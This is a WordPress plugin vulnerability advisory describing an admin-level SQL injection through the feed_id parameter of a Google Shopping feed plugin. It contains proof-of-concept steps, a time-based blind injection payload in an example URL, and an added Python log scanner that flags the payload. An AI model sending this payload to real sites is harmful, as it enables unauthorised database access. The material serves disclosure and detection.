WordPress Plugin Vulnerabilities

Sync WooCommerce Product feed to Google Shopping <= 1.2.4 - Admin+ SQLi

Description

The plugin does not properly sanitize the 'feed_id' POST parameter before using it in a SQL statement, leading to a SQL injection vulnerability in the admin dashboard.

Proof of Concept

1. Install the WooCommerce and 'Exportfeed for Woocommerce Google Product Feed' plugins.
2. Perform the initial configuration for the WooCommerce plugin and create a product.
3. In the ExportFeed plugin settings, go to Create Feed and click Custom Product Feed, search for a product, and capture the request with an intercepting proxy.
4. Modify the feed_id parameter to 1 AND (SELECT 2347 FROM (SELECT(SLEEP(5)))Otih)

https://example.com/wp-admin/admin-ajax.php?security=a5e2dfc8ec&action=gcpf_cart_product&feedpath=core/ajax/wp/fetch_product_ajax.php&keywords=snake&category=&brand=&sku=&merchat_type=Google&service_name=Google&limit=0,10&q=showT&feed_id=1 AND (SELECT 2347 FROM (SELECT(SLEEP(5)))Otih)
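
A detection check for the request shown above, as an added example that is not part of the original advisory: it scans web access logs for gcpf_cart_product requests whose feed_id is not a plain integer. The log lines are constructed, the combined log format and the function names are assumptions, and a feed_id sent in a POST body will not appear in access logs.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines (combined log format assumed); the client
# address and the nonce value are placeholders, not data from the advisory.
_LINE = ('203.0.113.5 - - [07/Mar/2022:10:00:0{n} +0000] '
         '"GET /wp-admin/admin-ajax.php?security=0000000000&action={action}'
         '&keywords=snake&limit=0,10&q=showT&feed_id={feed_id} HTTP/1.1" 200 512')
SAMPLE_LOG = [
    _LINE.format(n=1, action="gcpf_cart_product", feed_id="1"),
    _LINE.format(n=2, action="gcpf_cart_product",
                 feed_id="1%20AND%20(SELECT%202347%20FROM%20(SELECT(SLEEP(5)))Otih)"),
    _LINE.format(n=3, action="heartbeat", feed_id="abc"),
]

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[0-9.]+"')
INTEGER_RE = re.compile(r'[0-9]+')


def suspicious_feed_id(line):
    """Return the decoded feed_id when the line is a gcpf_cart_product
    AJAX request carrying a non-integer feed_id, otherwise None."""
    match = REQUEST_RE.search(line)
    if match is None:
        return None
    url = urlsplit(match.group(1))
    if not url.path.endswith("/wp-admin/admin-ajax.php"):
        return None
    # parse_qs percent-decodes values, so %20 and + both become spaces.
    params = parse_qs(url.query, keep_blank_values=True)
    if "gcpf_cart_product" not in params.get("action", []):
        return None
    for value in params.get("feed_id", []):
        if INTEGER_RE.fullmatch(value) is None:
            return value
    return None


def scan(lines):
    """Return (line_number, decoded_feed_id) for every flagged line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        value = suspicious_feed_id(line)
        if value is not None:
            hits.append((number, value))
    return hits


if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: non-integer feed_id: {value!r}")
```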

Classification

Type
SQLI

Miscellaneous

Original Researcher
0xdecafbad
Verified
Yes

Timeline

Publicly Published
2022-03-07 (about 2 years ago)
Added
2022-03-07 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)
